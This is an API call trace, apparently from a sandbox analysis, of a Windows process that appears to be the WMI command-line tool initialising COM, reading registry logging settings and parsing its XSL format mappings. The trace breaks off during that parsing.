	[0110.828] ResolveDelayLoadedAPI () returned 0x7ffc16032c50
	[0110.828] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0110.834] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0110.845] CoCreateInstance (in: rclsid=0x7ff66e6c3568*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3578*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7ff66e6da840 | out: ppv=0x7ff66e6da840*=0x2ad205e42f0) returned 0x0
	[0110.863] GetCurrentProcess () returned 0xffffffffffffffff
	[0110.863] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xd7edd8fa70 | out: TokenHandle=0xd7edd8fa70*=0x13c) returned 1
	[0110.863] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd7edd8fa68 | out: TokenInformation=0x0, ReturnLength=0xd7edd8fa68) returned 0
	[0110.863] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x2ad20875d80, TokenInformationLength=0x40, ReturnLength=0xd7edd8fa68 | out: TokenInformation=0x2ad20875d80, ReturnLength=0xd7edd8fa68) returned 1
	[0110.863] AdjustTokenPrivileges (in: TokenHandle=0x13c, DisableAllPrivileges=0, NewState=0x2ad20875d80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x42002e, Luid.HighPart=186337091, Attributes=0x385d))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0110.863] CloseHandle (hObject=0x13c) returned 1
	[0110.863] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0110.866] _vsnwprintf (in: _Buffer=0x2ad20875e20, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xd7edd8f778 | out: _Buffer="ms_409") returned 6
	[0110.866] GetComputerNameW (in: lpBuffer=0x2ad20875e70, nSize=0xd7edd8fa78 | out: lpBuffer="X2VS1CUM", nSize=0xd7edd8fa78) returned 1
	[0110.866] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.866] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.866] ResolveDelayLoadedAPI () returned 0x7ffc136a3fa0
	[0110.866] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xd7edd8fa70 | out: lpNameBuffer=0x0, nSize=0xd7edd8fa70) returned 0xd7edf97000
	[0110.867] GetLastError () returned 0xea
	[0110.867] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad20875ec0, nSize=0xd7edd8fa70 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8fa70) returned 0x1
	[0110.868] lstrlenW (lpString="") returned 0
	[0110.868] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3
	[0110.869] lstrlenW (lpString=".") returned 1
	[0110.869] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.869] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2=".", cchCount2=1) returned 3
	[0110.869] lstrlenW (lpString="LOCALHOST") returned 9
	[0110.869] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 3
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="X2VS1CUM", cchCount2=8) returned 2
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] lstrlenW (lpString="X2VS1CUM") returned 8
	[0110.870] ResolveDelayLoadedAPI () returned 0x7ffc16fc09f0
	[0110.872] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0110.872] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0110.872] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0110.873] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0110.873] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0110.873] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0110.873] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0110.873] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0110.873] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0110.873] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0110.873] SysStringLen (param_1="DELEGATE") returned 0x8
	[0110.873] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0110.873] SysStringLen (param_1="DELEGATE") returned 0x8
	[0110.873] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0110.873] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0110.873] SysStringLen (param_1="DELEGATE") returned 0x8
	[0110.873] SysStringLen (param_1="NONE") returned 0x4
	[0110.873] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.873] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.873] SysStringLen (param_1="NONE") returned 0x4
	[0110.873] SysStringLen (param_1="CONNECT") returned 0x7
	[0110.873] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.873] SysStringLen (param_1="CALL") returned 0x4
	[0110.873] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.873] SysStringLen (param_1="CALL") returned 0x4
	[0110.873] SysStringLen (param_1="CONNECT") returned 0x7
	[0110.873] SysStringLen (param_1="PKT") returned 0x3
	[0110.873] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.875] SysStringLen (param_1="PKT") returned 0x3
	[0110.875] SysStringLen (param_1="NONE") returned 0x4
	[0110.875] SysStringLen (param_1="NONE") returned 0x4
	[0110.875] SysStringLen (param_1="PKT") returned 0x3
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="NONE") returned 0x4
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="PKT") returned 0x3
	[0110.875] SysStringLen (param_1="PKT") returned 0x3
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0110.875] SysStringLen (param_1="DEFAULT") returned 0x7
	[0110.875] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0110.875] SysStringLen (param_1="PKT") returned 0x3
	[0110.875] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0110.875] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0110.876] GetSystemDirectoryW (in: lpBuffer=0x2ad20877cd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0110.876] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
	[0110.876] SysStringLen (param_1="\\wbem\\") returned 0x6
	[0110.876] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
	[0110.876] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
	[0110.876] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
	[0110.876] GetCurrentThreadId () returned 0x6bc
	[0110.877] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xd7edd8f370 | out: phkResult=0xd7edd8f370*=0x144) returned 0x0
	[0110.877] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xd7edd8f3c0, lpcbData=0xd7edd8f360*=0x400 | out: lpType=0x0, lpData=0xd7edd8f3c0*=0x30, lpcbData=0xd7edd8f360*=0x4) returned 0x0
	[0110.877] _wcsicmp (_String1="0", _String2="1") returned -1
	[0110.877] _wcsicmp (_String1="0", _String2="2") returned -2
	[0110.877] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xd7edd8f360*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xd7edd8f360*=0x42) returned 0x0
	[0110.877] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2ad208780e0, lpcbData=0xd7edd8f360*=0x42 | out: lpType=0x0, lpData=0x2ad208780e0*=0x25, lpcbData=0xd7edd8f360*=0x42) returned 0x0
	[0110.877] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0110.877] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0110.877] RegQueryValueExW (in: hKey=0x144, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xd7edd8f3c0, lpcbData=0xd7edd8f360*=0x400 | out: lpType=0x0, lpData=0xd7edd8f3c0*=0x36, lpcbData=0xd7edd8f360*=0xc) returned 0x0
	[0110.878] _wtol (_String="65536") returned 65536
	[0110.878] RegCloseKey (hKey=0x0) returned 0x6
	[0110.878] CoCreateInstance (in: rclsid=0x7ff66e6c35c8*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c35d8*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xd7edd8f868 | out: ppv=0xd7edd8f868*=0x2ad207b6f20) returned 0x0
	[0110.892] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2ad207b6f20, xmlSource=0xd7edd8f9a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xd7edd8fa20 | out: isSuccessful=0xd7edd8fa20*=0xffff) returned 0x0
	[0111.016] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2ad207b6f20, DOMElement=0xd7edd8f870 | out: DOMElement=0xd7edd8f870*=0x2ad207b94a0) returned 0x0
	[0111.016] IXMLDOMElement:getElementsByTagName (in: This=0x2ad207b94a0, tagName="XSLFORMAT", resultList=0xd7edd8f860 | out: resultList=0xd7edd8f860*=0x2ad207bca30) returned 0x0
	[0111.017] IXMLDOMNodeList:get_length (in: This=0x2ad207bca30, listLength=0xd7edd8fa30 | out: listLength=0xd7edd8fa30*=21) returned 0x0
	[0111.017] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=0, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.019] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.019] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.019] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.019] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0
	[0111.020] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.020] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.020] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.020] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=1, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.020] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="textvaluelist.xsl") returned 0x0
	[0111.020] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.020] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.020] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0
	[0111.020] SysStringLen (param_1="VALUE") returned 0x5
	[0111.020] SysStringLen (param_1="TABLE") returned 0x5
	[0111.020] SysStringLen (param_1="TABLE") returned 0x5
	[0111.020] SysStringLen (param_1="VALUE") returned 0x5
	[0111.020] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.020] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.020] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.020] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=2, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.021] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="textvaluelist.xsl") returned 0x0
	[0111.021] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.021] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.021] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0
	[0111.021] SysStringLen (param_1="LIST") returned 0x4
	[0111.021] SysStringLen (param_1="TABLE") returned 0x5
	[0111.021] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.021] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.021] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.021] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=3, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.021] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="rawxml.xsl") returned 0x0
	[0111.021] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.021] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.021] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0
	[0111.022] SysStringLen (param_1="RAWXML") returned 0x6
	[0111.022] SysStringLen (param_1="TABLE") returned 0x5
	[0111.022] SysStringLen (param_1="RAWXML") returned 0x6
	[0111.022] SysStringLen (param_1="LIST") returned 0x4
	[0111.022] SysStringLen (param_1="LIST") returned 0x4
	[0111.022] SysStringLen (param_1="RAWXML") returned 0x6
	[0111.022] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.022] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.022] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.022] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=4, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.022] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="htable.xsl") returned 0x0
	[0111.022] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.022] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.022] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0
	[0111.022] SysStringLen (param_1="HTABLE") returned 0x6
	[0111.022] SysStringLen (param_1="TABLE") returned 0x5
	[0111.022] SysStringLen (param_1="HTABLE") returned 0x6
	[0111.022] SysStringLen (param_1="LIST") returned 0x4
	[0111.022] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.022] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.022] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.022] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=5, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.023] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="hform.xsl") returned 0x0
	[0111.023] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.023] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.023] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0
	[0111.023] SysStringLen (param_1="HFORM") returned 0x5
	[0111.023] SysStringLen (param_1="TABLE") returned 0x5
	[0111.023] SysStringLen (param_1="HFORM") returned 0x5
	[0111.023] SysStringLen (param_1="LIST") returned 0x4
	[0111.023] SysStringLen (param_1="HFORM") returned 0x5
	[0111.023] SysStringLen (param_1="HTABLE") returned 0x6
	[0111.023] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.023] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.023] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.023] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=6, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.023] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="xml.xsl") returned 0x0
	[0111.023] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.023] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.023] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0
	[0111.024] SysStringLen (param_1="XML") returned 0x3
	[0111.024] SysStringLen (param_1="TABLE") returned 0x5
	[0111.024] SysStringLen (param_1="XML") returned 0x3
	[0111.024] SysStringLen (param_1="VALUE") returned 0x5
	[0111.024] SysStringLen (param_1="VALUE") returned 0x5
	[0111.024] SysStringLen (param_1="XML") returned 0x3
	[0111.024] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.024] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.024] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.024] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=7, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.024] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="mof.xsl") returned 0x0
	[0111.024] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.024] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.024] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0
	[0111.024] SysStringLen (param_1="MOF") returned 0x3
	[0111.024] SysStringLen (param_1="TABLE") returned 0x5
	[0111.024] SysStringLen (param_1="MOF") returned 0x3
	[0111.024] SysStringLen (param_1="LIST") returned 0x4
	[0111.024] SysStringLen (param_1="MOF") returned 0x3
	[0111.024] SysStringLen (param_1="RAWXML") returned 0x6
	[0111.024] SysStringLen (param_1="LIST") returned 0x4
	[0111.024] SysStringLen (param_1="MOF") returned 0x3
	[0111.024] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.024] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.024] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.025] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=8, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.025] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="csv.xsl") returned 0x0
	[0111.025] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.025] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.025] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0
	[0111.025] SysStringLen (param_1="CSV") returned 0x3
	[0111.025] SysStringLen (param_1="TABLE") returned 0x5
	[0111.026] SysStringLen (param_1="CSV") returned 0x3
	[0111.026] SysStringLen (param_1="LIST") returned 0x4
	[0111.026] SysStringLen (param_1="CSV") returned 0x3
	[0111.026] SysStringLen (param_1="HTABLE") returned 0x6
	[0111.026] SysStringLen (param_1="CSV") returned 0x3
	[0111.026] SysStringLen (param_1="HFORM") returned 0x5
	[0111.026] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.026] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.026] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.026] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=9, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.026] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.026] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.027] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.027] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0
	[0111.027] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.027] SysStringLen (param_1="TABLE") returned 0x5
	[0111.027] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.027] SysStringLen (param_1="VALUE") returned 0x5
	[0111.027] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.027] SysStringLen (param_1="XML") returned 0x3
	[0111.027] SysStringLen (param_1="XML") returned 0x3
	[0111.027] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.027] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.027] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.027] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.027] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=10, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.027] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.027] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.027] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.027] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0
	[0111.028] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.028] SysStringLen (param_1="TABLE") returned 0x5
	[0111.028] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.028] SysStringLen (param_1="XML") returned 0x3
	[0111.028] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.028] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.028] SysStringLen (param_1="XML") returned 0x3
	[0111.028] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.028] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.028] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.028] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.028] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=11, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.028] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.028] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
